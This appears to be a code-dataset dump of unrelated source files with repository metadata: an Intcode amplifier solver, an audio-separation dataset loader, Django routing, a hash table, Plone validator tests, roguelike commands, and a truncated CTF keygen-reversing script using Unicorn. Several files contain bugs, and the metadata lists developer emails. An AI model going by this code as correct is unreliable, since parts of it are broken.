og = [3,8,1001,8,10,8,105,1,0,0,21,46,67,76,101,118,199,280,361,442,99999,3,9,1002,9,4,9,1001,9,2,9,102,3,9,9,101,3,9,9,102,2,9,9,4,9,99,3,9,1001,9,3,9,102,2,9,9,1001,9,2,9,1002,9,3,9,4,9,99,3,9,101,3,9,9,4,9,99,3,9,1001,9,2,9,1002,9,5,9,101,5,9,9,1002,9,4,9,101,5,9,9,4,9,99,3,9,102,2,9,9,1001,9,5,9,102,2,9,9,4,9,99,3,9,1002,9,2,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,2,9,9,4,9,3,9,101,1,9,9,4,9,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,1,9,9,4,9,3,9,102,2,9,9,4,9,3,9,101,2,9,9,4,9,99,3,9,101,1,9,9,4,9,3,9,1002,9,2,9,4,9,3,9,102,2,9,9,4,9,3,9,101,1,9,9,4,9,3,9,101,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,101,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,2,9,9,4,9,99,3,9,1001,9,1,9,4,9,3,9,1002,9,2,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,1,9,9,4,9,3,9,102,2,9,9,4,9,3,9,1001,9,1,9,4,9,3,9,1002,9,2,9,4,9,3,9,1001,9,1,9,4,9,3,9,101,1,9,9,4,9,3,9,101,2,9,9,4,9,99,3,9,1002,9,2,9,4,9,3,9,1001,9,1,9,4,9,3,9,101,2,9,9,4,9,3,9,101,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,101,1,9,9,4,9,3,9,1001,9,2,9,4,9,99,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,101,2,9,9,4,9,3,9,101,1,9,9,4,9,3,9,101,2,9,9,4,9,3,9,1001,9,2,9,4,9,3,9,1001,9,2,9,4,9,3,9,101,2,9,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,2,9,9,4,9,99]
og = [3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0]
class Amp():
def __init__(self, phase, sequence=og):
self.phase = phase
self.sequence = sequence
self.phase_used = False
self.four_value = None
def run(self, input_):
self.pos = 0
self.input_ = input_
while self.pos < len(self.sequence):
x = str(self.sequence[self.pos])
while len(x) < 5:
x = '0' + x
ones = int(x[-3])
twos = int(x[-4])
threes=int(x[-5])
code = int(x[-2:])
if code == 99:
return self.four_value
if ones == 0:
try:
one_spot = self.sequence[self.pos+1]
except IndexError:
one_spot = None
else:
one_spot = self.pos+1
if twos == 0:
try:
two_spot = self.sequence[self.pos+2]
except IndexError:
two_spot = None
else:
two_spot = self.pos+2
if threes == 0:
try:
three_spot = self.sequence[self.pos+3]
except IndexError:
three_spot = None
else:
three_spot = self.pos+3
self.spots = (0, one_spot, two_spot, three_spot)
self.process_code(code)
def process_code(self, code):
print(self.sequence)
if code == 1:
self.one()
elif code == 2:
self.two()
elif code == 3:
self.three()
elif code == 4:
self.four()
elif code == 5:
self.five()
elif code == 6:
self.six()
elif code == 7:
self.seven()
elif code == 8:
self.eight()
def one(self):
self.sequence[self.spots[3]] = self.sequence[self.spots[1]] + \
self.sequence[self.spots[2]]
self.pos += 4
def two(self):
self.sequence[self.spots[3]] = self.sequence[self.spots[1]] * \
self.sequence[self.spots[2]]
self.pos += 4
def three(self):
if self.phase_used:
self.sequence[self.spots[1]] = self.input_
else:
self.sequence[self.spots[1]] = self.phase
self.phase_used = True
self.pos += 2
def four(self):
if self.sequence[self.spots[1]]:
self.four_value = self.sequence[self.spots[1]]
self.pos += 2
def five(self):
if self.sequence[self.spots[1]] != 0:
self.pos = self.sequence[self.spots[2]]
else:
self.pos += 3
def six(self):
if self.sequence[self.spots[1]]:
self.pos += 3
else:
self.pos = self.sequence[self.spots[2]]
def seven(self):
if self.sequence[self.spots[1]] < self.sequence[self.spots[2]]:
self.sequence[self.spots[3]] = 1
else:
self.sequence[self.spots[3]] = 0
self.pos += 4
def eight(self):
if self.sequence[self.spots[1]] == self.sequence[self.spots[2]]:
self.sequence[self.spots[3]] = 1
else:
self.sequence[self.spots[3]] = 0
self.pos += 4
from itertools import permutations
input_1 = 0
best_thrust = 0
for combo in permutations([5, 6, 7, 8, 9], 5):
print(combo)
amp_list = []
for phase in combo:
amp_list.append(Amp(phase, og.copy()))
combo_score = 0
x = 0
output = amp_list[x].run(input_1)
combo_score += output
while output:
if x > 3:
x = 0
else:
x += 1
if output == True:
break
combo_score += output
output = amp_list[x].run(output)
best_thrust = max(best_thrust, combo_score)
print(best_thrust)
|
[
"jacobcarlmaxfield@gmail.com"
] |
jacobcarlmaxfield@gmail.com
|
f9dce4240433ce38d9194cea922badddef39792a
|
391bca5157a1de3f94cb4dfbd7d3cd83665d0be5
|
/audioDatasetHdf.py
|
b6ee1017bdaa7b7193040ec9c2d6cbd5a98d442b
|
[] |
no_license
|
yogurtss/dual_path
|
69470ff1ebba63d32c95b988d51e8f73bd21b702
|
479bba58326058af6e41018b2e0037319fe7ee8c
|
refs/heads/master
| 2021-05-19T14:10:28.672095
| 2020-03-31T21:58:44
| 2020-03-31T21:58:44
| 251,749,967
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,711
|
py
|
import musdb
import soundfile
import os
import librosa as lib
from tqdm import tqdm
import numpy as np
import torch
from sortedcontainers import SortedList
import h5py
import torch.nn as nn
from dataset.util import *
def getMUSDB(database_path):
# 导入数据
mus = musdb.DB(root=database_path, is_wav=False)
subsets = list()
for subset in ["train", "test"]:
tracks = mus.load_mus_tracks(subset)
samples = list()
# Go through tracks
for track in tracks:
# Skip track if mixture is already written, assuming this track is done already
# track_path = track.path[:-4]
track_path = SAVE_PATH + subset + '/' + track.name
if not os.path.exists(track_path):
os.mkdir(track_path)
mix_path = track_path + "/mix.wav"
acc_path = track_path + "/accompaniment.wav"
if os.path.exists(mix_path):
print("WARNING: Skipping track " + mix_path + " since it exists already")
# Add paths and then skip
paths = {"mix": mix_path, "accompaniment": acc_path}
paths.update({key: track_path + "_" + key + ".wav" for key in ["bass", "drums", "other", "vocals"]})
samples.append(paths)
continue
rate = track.rate
# Go through each instrument
paths = dict()
stem_audio = dict()
for stem in ["bass", "drums", "other", "vocals"]:
path = track_path + '/' + stem + ".wav"
audio = track.targets[stem].audio.T
soundfile.write(path, audio, rate, "PCM_16")
stem_audio[stem] = audio
paths[stem] = path
# Add other instruments to form accompaniment
acc_audio = np.clip(sum([stem_audio[key] for key in list(stem_audio.keys()) if key != "vocals"]), -1.0, 1.0)
soundfile.write(acc_path, acc_audio, rate, "PCM_16")
paths["accompaniment"] = acc_path
# Create mixture
mix_audio = track.audio.T
soundfile.write(mix_path, mix_audio, rate, "PCM_16")
paths["mix"] = mix_path
diff_signal = np.abs(mix_audio - acc_audio - stem_audio["vocals"])
print("Maximum absolute deviation from source additivity constraint: " + str(
np.max(diff_signal))) # Check if acc+vocals=mix
print("Mean absolute deviation from source additivity constraint: " + str(np.mean(diff_signal)))
samples.append(paths)
subsets.append(samples)
train_val_list = subsets[0]
test_list = subsets[1]
np.random.seed(42)
train_list = np.random.choice(train_val_list, 75, replace=False)
val_list = [elem for elem in train_val_list if elem not in train_list]
dataset = {'train': train_list,
'val': val_list,
'test': test_list}
return dataset
class AudioDataset(nn.Module):
def __init__(self, partition, instruments, sr, channels, out_channels, random_hops, hdf_dir, shapes, audio_transform=None, in_memory=False):
super(AudioDataset, self).__init__()
self.hdf_dir = os.path.join(hdf_dir, partition + ".hdf5")
self.random_hops = random_hops
self.sr = sr
self.channels = channels
self.audio_transform = audio_transform
self.in_memory = in_memory
self.instruments = instruments
self.shapes = shapes
self.out_channels = out_channels
print('Preparing {} dataset...'.format(partition))
# Go through HDF and collect lengths of all audio files
with h5py.File(self.hdf_dir, "r") as f:
lengths = [f[str(song_idx)].attrs["target_length"] for song_idx in range(len(f))]
# Subtract input_size from lengths and divide by hop size to determine number of starting positions
lengths = [(l // self.shapes['length']) + 1 for l in lengths]
self.start_pos = SortedList(np.cumsum(lengths))
self.length = self.start_pos[-1]
self.dataset = h5py.File(self.hdf_dir, 'r', driver="core")
def __len__(self):
return self.length
def __getitem__(self, idx):
# Find out which slice of targets we want to read
audio_idx = self.start_pos.bisect_right(idx)
if audio_idx > 0:
idx = idx - self.start_pos[audio_idx - 1]
# Check length of audio signal
audio_length = self.dataset[str(audio_idx)].attrs["length"]
target_length = self.dataset[str(audio_idx)].attrs["target_length"]
# Determine position where to start targets
if self.random_hops:
start_target_pos = np.random.randint(0, max(target_length - self.shapes['length'] + 1, 1))
else:
# Map item index to sample position within song
start_target_pos = idx * self.shapes['length']
start_pos = start_target_pos
if start_pos < 0:
# Pad manually since audio signal was too short
pad_front = abs(start_pos)
start_pos = 0
else:
pad_front = 0
end_pos = start_target_pos + self.shapes['length']
if end_pos > audio_length:
# Pad manually since audio signal was too short
pad_back = end_pos - audio_length
end_pos = audio_length
else:
pad_back = 0
# Read and return
audio = self.dataset[str(audio_idx)]["inputs"][:, start_pos:end_pos].astype(np.float32)
if pad_front > 0 or pad_back > 0:
audio = np.pad(audio, [(0, 0), (pad_front, pad_back)], mode="constant", constant_values=0.0)
targets = self.dataset[str(audio_idx)]["targets"][:, start_pos:end_pos].astype(np.float32)
if pad_front > 0 or pad_back > 0:
targets = np.pad(targets, [(0, 0), (pad_front, pad_back)], mode="constant", constant_values=0.0)
sources = {}
for id, inst in enumerate(self.instruments.keys()):
sources[inst] = targets[id * self.channels:(id + 1) * self.channels]
del targets
if hasattr(self, "audio_transform") and self.audio_transform is not None:
audio, sources = self.audio_transform(audio, sources)
idx_temp = 0
targets = np.zeros([self.out_channels, self.shapes['length']], dtype=np.float32)
if self.out_channels == 1:
targets = sources['accompaniment']
else:
for k in sources.keys():
if k == 'other':
continue
targets[idx_temp] = sources[k]
idx_temp += 1
return torch.tensor(audio).squeeze(), torch.tensor(targets)
if __name__ == '__main__':
partition = 'train'
INSTRUMENTS = {"bass": True,
"drums": True,
"other": True,
"vocals": True,
"accompaniment": True}
shapes = {'start_frame': 6140,
'end_frame': 51201,
'output_len': 45061,
'input_len': 57341}
sr = 22050
channels = 1
augment_func = lambda mix, targets: random_amplify(mix, targets, 0.7, 1.0, shapes)
crop_func = lambda mix, targets: crop(mix, targets, shapes)
dataset = AudioDataset(partition, INSTRUMENTS, sr, channels, 2, True, hdf_dir='../H5/', shapes=shapes, audio_transform=augment_func)
dataset[0]
dataset[1]
print('test')
|
[
"noreply@github.com"
] |
yogurtss.noreply@github.com
|
e28726924a187a1dcb5a4094e5ec1bb966898601
|
1777f5e6f3129e5e2df75161f669eb0531355a0b
|
/myweb/mysite/mysite/urls.py
|
d8a926e25371899e3a82b7ef589d0b22daf50f5b
|
[] |
no_license
|
HakimdarC/CRUD-project-Django-Django
|
ca52b3420a3e25fcebea7f855102a9e306dcbb19
|
4fe51989e1be7940331ddb89ccc7992a6a49559a
|
refs/heads/master
| 2022-10-08T04:01:41.530990
| 2019-07-26T12:04:02
| 2019-07-26T12:04:02
| 195,555,184
| 0
| 1
| null | 2022-10-03T14:09:50
| 2019-07-06T15:33:10
|
Python
|
UTF-8
|
Python
| false
| false
| 982
|
py
|
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from myapp import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from . import views
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
path('', views.index, name='index'),
path('myapp/', include("myapp.urls"), name='myapp'),
path('admin/', admin.site.urls)
]
urlpatterns += staticfiles_urlpatterns()
|
[
"moseshakim23@gmail.com"
] |
moseshakim23@gmail.com
|
736d14a11bc8f5c100eaeef9314edb90e4aed66d
|
775a51872851cd8d60ecf7b6c5f2a46103bc0bbc
|
/Dict-Hashing.py
|
68b469e28de0edb396baf1b468ec90496094f53a
|
[] |
no_license
|
Prabhanda-Akiri/Data-Structures-Implementation
|
08e285c29f7ed6794f937cf79e6d8f3cc7b18b99
|
d184b01889cbe68ec9ed033a353867a12e7f6edd
|
refs/heads/master
| 2021-01-20T10:46:45.927412
| 2018-01-22T08:43:46
| 2018-01-22T08:43:46
| 101,647,843
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,494
|
py
|
class LinkedList:
"""Defines a Singly Linked List.
attributes: head
"""
def __init__(self):
"""Create a new list with a Sentinel Node"""
self.head=ListNode('a')
def insert(self,x,s):
"""Insert element x in the position after p"""
self.temp=ListNode(s)
self.temp.value=x
self.temp.next=self.head.next
self.head.next=self.temp
def delete(self,p):
"""Delete the node following node p in the linked list."""
temp=self.searc(p)
temp.next=temp.next.next
def printlist(self):
""" Print all the elements of a list in a row."""
self.temp=ListNode('a')
self.temp=self.head.next
while self.temp != None :
print (self.temp.value)
print(self.temp.s)
self.temp=self.temp.next
def search(self,x):
"""Search for value x in the list. Return a reference to the first node with value x; return None if no such node is found."""
self.temp=ListNode('a')
self.temp=self.head
c=-1
while self.temp.next!=None :
self.temp=self.temp.next
c=c+1
if self.temp.s == x :
return c
return c
def searc(self,x):
"""Search for value x in the list. Return a reference to the first node with value x; return None if no such node is found."""
self.temp=ListNode('a')
self.temp=self.head
while self.temp.next!=None :
if self.temp.next.s == x :
return self.temp
self.temp=self.temp.next
return self.head
def len(self):
"""Return the length (the number of elements) in the Linked List."""
self.temp=ListNode('a')
self.temp=self.head.next
self.count=0
while self.temp!=None:
self.count=self.count+1
self.temp=self.temp.next
return self.count
class ListNode:
"""Represents a node of a Singly Linked List.
attributes: value, next.
"""
def __init__(self,s):
self.value=0
self.s=s
self.next=None
class HashTable :
def __init__(self) :
self.T=[None for i in range(30)]
for i in range (0,30):
self.T[i]=LinkedList()
def ins(self,s) :
x=s
n=len(x)
k=0
for i in range(0,n) :
k=k+ord(x[i])
h_k=k % 30
print('the list in T[',h_k,'] is')
self.T[h_k].insert(k,s)
self.T[h_k].printlist()
def dele(self,s) :
x=s
n=len(x)
k=0
for i in range(0,n) :
k=k+ord(x[i])
h_k=k % 30
self.T[h_k].delete(s)
print('the list in T[',h_k,'] is')
self.T[h_k].printlist()
def sear(self,s) :
x=s
n=len(x)
k=0
for i in range(0,n) :
k=k+ord(x[i])
h_k=k % 30
print('the string',s,'is present in',h_k,'th column of hash table and in the following position of linked list')
return self.T[h_k].search(k)
def main():
h=HashTable()
h.ins('apple')
h.ins('ball')
h.ins('cat')
h.ins('act')
h.ins('tac')
h.ins('atc')
print(h.sear('cat'))
h.dele('tac')
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
Prabhanda-Akiri.noreply@github.com
|
2b900473f8ebad3774236008a4ce12609bd077c4
|
c4af67db4c523d20f2d55aef90ba77db1fb53c38
|
/validation/tests/test_validation.py
|
c1128b9d609b6db323abf0d49d809d2207be7177
|
[] |
no_license
|
dtgit/dtedu
|
e59b16612d7d9ea064026bf80a44657082ef45a3
|
d787885fe7ed0de6f9e40e9b05d852a0e9d60677
|
refs/heads/master
| 2020-04-06T05:22:50.025074
| 2009-04-08T20:13:20
| 2009-04-08T20:13:20
| 171,351
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,060
|
py
|
from Testing import ZopeTestCase
from Products.Archetypes.tests.atsitetestcase import ATSiteTestCase
from Testing.ZopeTestCase import doctest
from Products.validation import validation
class TestValidation(ATSiteTestCase):
def test_inNumericRange(self):
v = validation.validatorFor('inNumericRange')
self.failUnlessEqual(v(10, 1, 20), 1)
self.failUnlessEqual(v('10', 1, 20), 1)
self.failIfEqual(v(0, 4, 5), 1)
def test_isPrintable(self):
v = validation.validatorFor('isPrintable')
self.failUnlessEqual(v('text'), 1)
self.failIfEqual(v('\u203'), 1)
self.failIfEqual(v(10), 1)
def test_isSSN(self):
v = validation.validatorFor('isSSN')
self.failUnlessEqual(v('111223333'), 1)
self.failUnlessEqual(v('111-22-3333', ignore=r'-'), 1)
def test_isUSPhoneNumber(self):
v = validation.validatorFor('isUSPhoneNumber')
self.failUnlessEqual(v('(212) 555-1212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('2125551212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('(212) 555-1212'), 1)
def test_isURL(self):
v = validation.validatorFor('isURL')
self.failUnlessEqual(v('http://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('https://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('irc://tiran@irc.freenode.net:6667/#plone'), 1)
self.failUnlessEqual(v('fish://tiran:password@myserver/~/'), 1)
self.failIfEqual(v('http://\n'), 1)
self.failIfEqual(v('../foo/bar'), 1)
def test_isEmail(self):
v = validation.validatorFor('isEmail')
self.failUnlessEqual(v('test@test.com'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('me'), 1)
def test_isMailto(self):
v = validation.validatorFor('isMailto')
self.failUnlessEqual(v('mailto:test@test.com'), 1)
self.failIfEqual(v('test@test.com'), 1)
self.failIfEqual(v('mailto:@foo.bar'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('mailto:'), 1)
self.failIfEqual(v('me'), 1)
def test_isUnixLikeName(self):
v = validation.validatorFor('isUnixLikeName')
self.failUnlessEqual(v('abcd'), 1)
self.failUnless(v('a_123456'), 1)
self.failIfEqual(v('123'), 1)
self.failIfEqual(v('ab.c'), 1)
self.failIfEqual(v('ab,c'), 1)
self.failIfEqual(v('aaaaaaaab'), 1) # too long
def test_isValidId(self):
v = validation.validatorFor("isValidId")
self.failIfEqual(v("a b", object()), 1)
# TODO: more tests require a site
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestValidation))
doctests = (
'Products.validation.validators.ExpressionValidator',
)
for module in doctests:
suite.addTest(doctest.DocTestSuite(module))
return suite
|
[
"ron@domU-12-31-39-02-65-03.compute-1.internal"
] |
ron@domU-12-31-39-02-65-03.compute-1.internal
|
c142161627e8cc6cd58d55944d32e4c84a8c57d9
|
123d70d21419fbdf6939135e09b263f145f4174e
|
/new/plomrogue/commands.py
|
744d471fac100bc5e326813899d93466a353566e
|
[] |
no_license
|
plomlompom/plomrogue2-experiments
|
53aaf24ca88bc49bc21d13616de5126fa488ee31
|
a466115714f7da37c45d3fd0d054d67f85a725f0
|
refs/heads/master
| 2021-01-20T00:28:33.601033
| 2019-05-13T11:13:26
| 2019-05-13T11:13:26
| 89,135,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,931
|
py
|
from plomrogue.misc import quote
def cmd_GEN_WORLD(game, yx, seed):
game.make_new_world(yx, seed)
cmd_GEN_WORLD.argtypes = 'yx_tuple:pos int:nonneg'
def cmd_GET_GAMESTATE(game, connection_id):
"""Send game state to caller."""
game.send_gamestate(connection_id)
def cmd_SEED(game, seed):
game.rand.prngod_seed = seed
cmd_SEED.argtypes = 'int:nonneg'
def cmd_MAP_SIZE(game, size):
game.map_size = size
cmd_MAP_SIZE.argtypes = 'yx_tuple:pos'
def cmd_MAP(game, map_pos):
"""Ensure (possibly empty/'?'-filled) map at position map_pos."""
game.get_map(map_pos)
cmd_MAP.argtypes = 'yx_tuple'
def cmd_THING_TYPE(game, i, type_):
t_old = game.get_thing(i)
t_new = game.thing_types[type_](game, i)
#attr_names_of_old = [name for name in dir(t_old) where name[:2] != '__']
#attr_names_of_new = [name for name in dir(t_new) where name[:2] != '__']
#class_new = type(t_new)
#for attr_name in [v for v in attr_names_of_old if v in attr_names_of_new]:
# if hasattr(class_new, attr_name):
# attr_new = getattr(class_new, attr_name)
# if type(attr_new) == property and attr_new.fset is None:
# continue # ignore read-only properties on t_new
# attr_old = getattr(t_old, attr_name)
# attr_new = getattr(t_new, attr_name)
# if type(attr_old) != type(attr_new):
# continue
# setattr(t_new, attr_name, attr_old)
t_new.position = t_old.position
t_new.in_inventory = t_old.in_inventory
t_old_index = game.things.index(t_old)
game.things[t_old_index] = t_new
cmd_THING_TYPE.argtypes = 'int:nonneg string:thingtype'
def cmd_THING_POS(game, i, big_yx, small_yx):
t = game.get_thing(i)
t.position = (big_yx, small_yx)
cmd_THING_POS.argtypes = 'int:nonneg yx_tuple yx_tuple:nonneg'
def cmd_THING_INVENTORY(game, id_, ids):
carrier = game.get_thing(id_)
carrier.inventory = ids
for id_ in ids:
t = game.get_thing(id_)
t.in_inventory = True
t.position = carrier.position
cmd_THING_INVENTORY.argtypes = 'int:nonneg seq:int:nonneg'
def cmd_THING_HEALTH(game, id_, health):
t = game.get_thing(id_)
t.health = health
cmd_THING_HEALTH.argtypes = 'int:nonneg int:nonneg'
def cmd_GET_PICKABLE_ITEMS(game, connection_id):
pickable_ids = game.player.get_pickable_items()
if len(pickable_ids) > 0:
game.io.send('PICKABLE_ITEMS %s' %
','.join([str(id_) for id_ in pickable_ids]))
else:
game.io.send('PICKABLE_ITEMS ,')
def cmd_TERRAIN_LINE(game, big_yx, y, terrain_line):
game.maps[big_yx].set_line(y, terrain_line)
cmd_TERRAIN_LINE.argtypes = 'yx_tuple int:nonneg string'
def cmd_PLAYER_ID(game, id_):
# TODO: test whether valid thing ID
game.player_id = id_
cmd_PLAYER_ID.argtypes = 'int:nonneg'
def cmd_TURN(game, n):
game.turn = n
cmd_TURN.argtypes = 'int:nonneg'
def cmd_SWITCH_PLAYER(game):
game.player.set_task('WAIT')
thing_ids = [t.id_ for t in game.things]
player_index = thing_ids.index(game.player.id_)
if player_index == len(thing_ids) - 1:
game.player_id = thing_ids[0]
else:
game.player_id = thing_ids[player_index + 1]
game.proceed()
def cmd_SAVE(game):
def write(f, msg):
f.write(msg + '\n')
save_file_name = game.io.game_file_name + '.save'
with open(save_file_name, 'w') as f:
write(f, 'TURN %s' % game.turn)
write(f, 'SEED %s' % game.rand.prngod_seed)
write(f, 'MAP_SIZE %s' % (game.map_size,))
for map_pos in game.maps:
write(f, 'MAP %s' % (map_pos,))
for map_pos in game.maps:
for y, line in game.maps[map_pos].lines():
write(f, 'TERRAIN_LINE %s %5s %s' % (map_pos, y, quote(line)))
for thing in game.things:
write(f, 'THING_TYPE %s %s' % (thing.id_, thing.type_))
write(f, 'THING_POS %s %s %s' % (thing.id_, thing.position[0],
thing.position[1]))
if hasattr(thing, 'health'):
write(f, 'THING_HEALTH %s %s' % (thing.id_, thing.health))
if len(thing.inventory) > 0:
write(f, 'THING_INVENTORY %s %s' %
(thing.id_,','.join([str(i) for i in thing.inventory])))
else:
write(f, 'THING_INVENTORY %s ,' % thing.id_)
if hasattr(thing, 'task'):
task = thing.task
if task is not None:
task_args = task.get_args_string()
task_name = [k for k in game.tasks.keys()
if game.tasks[k] == task.__class__][0]
write(f, 'SET_TASK:%s %s %s %s' % (task_name, thing.id_,
task.todo, task_args))
write(f, 'PLAYER_ID %s' % game.player_id)
cmd_SAVE.dont_save = True
|
[
"c.heller@plomlompom.de"
] |
c.heller@plomlompom.de
|
b83e8246703e0232b938a556394aff5db7517139
|
e7b87b4377660adf9872a0fd361b2f66ef2f4cfa
|
/advent_2019/ChristmaSSE_KeyGen/reverse.py
|
1d66bf5fad064d0e78c99dbd0d0e4cc245d83362
|
[] |
no_license
|
passwd0/ctf
|
a215dbabfb0a97723e7e805c4938b833c454c166
|
e5a6e4769308ed6283e7e20c6852683bdac5cedd
|
refs/heads/master
| 2020-12-01T15:04:08.186238
| 2019-12-28T22:12:24
| 2019-12-28T22:12:24
| 230,649,411
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,513
|
py
|
#!/bin/python
from cachetools import cached, LRUCache, TTLCache
import time
import numpy as np
import struct
from unicorn import *
from unicorn.x86_const import *
#def internalCycle():
# return 0
# #m6 = m4
# #pcmpgtd xmm6, xmm3
# #paddd xmm6, xmm5
# #pmulld xmm6, xmm4
# #psubd xmm3, xmm6
# #movdqa xmm6, xmm4
# #pcmpgtd xmm6, xmm2
# #paddd xmm6, xmm5
# #pmulld xmm6, xmm4
# #psubd xmm2, xmm6
# #movdqa xmm6, xmm4
# #pcmpgtd xmm6, xmm1
# #paddd xmm6, xmm5
# #pmulld xmm6, xmm4
# #psubd xmm1, xmm6
# #movdqa xmm6, xmm4
# #pcmpgtd xmm6, xmm0
# #paddd xmm6, xmm5
# #pmulld xmm6, xmm4
# #psubd xmm0, xmm6
# #add edx, 0xffffffff
#
@cached(cache={})
def pshufd(src,order):
line=bin(src)[2:].rjust(128,"0")
n=32
src=[line[i:i+n] for i in range(0, len(line), n)][::-1]
#print(src)
line=bin(order)[2:].rjust(8,"0")
n=2
order=[line[i:i+n] for i in range(0, len(line), n)]
#print(order)
res=""
for i in order:
val=int(i,2)
res+=src[val]
#print(int(res,2))
return int(res,2)
@cached(cache={})
def pmulld(val1,val2):
line=bin(val1)[2:]
line=line.rjust(128,"0")
n=32
val1=[line[i:i+n] for i in range(0, len(line), n)]
line=bin(val2)[2:].rjust(128,"0")
n=32
val2=[line[i:i+n] for i in range(0, len(line), n)]
#print(val1,val2)
res=""
for i,j in zip(val1,val2):
res+=str(int(i,2)*int(j,2)).rjust(32,"0")
return int(res,16)
@cached(cache={})
def paddd(val1,val2):
line=bin(val1)[2:]
line=line.rjust(128,"0")
n=32
val1=[line[i:i+n] for i in range(0, len(line), n)]
line=bin(val2)[2:].rjust(128,"0")
n=32
val2=[line[i:i+n] for i in range(0, len(line), n)]
#print(val1,val2)
res=""
for i,j in zip(val1,val2):
res+=str(int(i,2)+int(j,2)).rjust(32,"0")
return int(res,16)
@cached(cache={})
def m_fun(s1, s2, s3):
m = pmulld(s1, s2)
m = paddd(m, s3)
return m
@cached(cache={})
def fun(s1, s2, s3, s4):
m = m_fun(s1, s2, s3)
m = paddd(m, s4)
return m
@cached(cache={})
def mainFake():
start_time = time.time()
data = open('reverse_data', 'rb').read()
res = int.from_bytes(data[64:80], byteorder='little')
i0 = pshufd(res, 0x15)
i1 = pshufd(res, 0x45)
i2 = pshufd(res, 0x51)
i3 = pshufd(res, 0x54)
# print(hex(i0),hex(i1),hex(i2),hex(i3))
# ----------------------------------
# i = [
# [1, 0, 0, 0],
# [0, 1, 0, 0],
# [0, 0, 1, 0],
# [0, 0, 0, 1]
# ]
counter = 0x112210f47de98115
rax = 0
# d9 = int.from_bytes(data[:16], byteorder='little')
# d10 = int.from_bytes(data[16:32], byteorder='little')
# d13 = int.from_bytes(data[32:48], byteorder='little')
# d15 = int.from_bytes(data[48:64], byteorder='little')
#
# s00 = pshufd(d9, 0)
# s01 = pshufd(d9, 0x55)
# sss5= pshufd(d9, 0xaa)
# s03 = pshufd(d9, 0xff)
#
# s10 = pshufd(d10, 0)
# s5 = pshufd(d10, 0x55)
# s12 = pshufd(d10, 0xaa)
# s13 = pshufd(d10, 0xff)
#
# s20 = pshufd(d13, 0)
# s21 = pshufd(d13, 0x55)
# s22 = pshufd (d13, 0xaa)
# s23 = pshufd(d13, 0xff)
#
# s30 = pshufd(d15, 0)
# s31 = pshufd(d15, 0x55)
# s32 = pshufd(d15, 0xaa)
# s33 = pshufd(d15, 0xff)
#
# print(hex(s00 ), hex(s01), hex(sss5), hex(s03 ))
# print(hex(s10 ), hex(s5 ), hex(s12), hex(s13 ))
# print(hex(s20), hex(s21 ), hex(s22 ), hex(s23))
# print(hex(s30), hex(s31 ), hex(s32 ), hex(s33))
#
# #---------------------------------
s00 = 1 ; s01 = 2 ; s02 = 3 ; s03 = 4 ;
s10 = 5 ; s11 = 6 ; s12 = 7 ; s13 = 8 ;
s20 = 9 ; s21 = 10; s22 = 11; s23 = 12;
s30 = 13; s31 = 14; s32 = 15; s33 = 16;
# s = [
# [1 , 2, 3, 4],
# [5 , 6, 7, 8],
# [9 ,10,11,12],
# [13,14,15,16]
# ]
while(rax != counter):
# prima colonna
m6 = pmulld(s00, i3)
m8 = pmulld(s10, i3)
m11 = pmulld(s20, i3)
m14 = pmulld(s30, i3)
#--------------------
m12 = m_fun(s01, i2, m6) #xmm12s * xmm2 * xmm6 = xmm12
m5 = pmulld(s11, i1) #xmm5s *xmm1 = xmm5
i3 = fun(s03, i0, m5, m12)
mm5 = m_fun(s11, i2, m8)
m7 = m_fun(s21, i2, s20)
mm6 = pmulld(s12, i1) #64c
i2 = fun(s13, i0, mm6, mm5) #662
mmm5 = pmulld(s22, i1)
mmm6 = pmulld(s32, i1) #680
i1 = fun(s23, i0, mmm5, m7)
m4 = m_fun(s31, i2, m14)
i0 = fun(s33, i0, mmm6, m4)
#internal cycle
# m4 = pshufd(sres, 0xaa)
# m5 = pshufd(i0, 0)
# edx = 0x3e8
# internalCycle()
rax += 1
if rax % 10000000 == 0:
print(time.time()-start_time)
def emulation(matrix):
BASE = 0x400000
STACK = 0x7ffcaf000000
FLAG = 0x00600000
mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(BASE, 1024*4)
mu.mem_map(STACK, 1024*4)
mu.mem_map(FLAG, 1024*1024)
code = struct.pack ("69B", *[
0x66,0x0f,0x7f,0x1c,0x24,0x66,0x0f,0x7f,0x54,0x24,0x10,
0x66,0x0f,0x7f,0x4c,0x24,0x20,0x66,0x0f,0x7f,0x44,0x24,
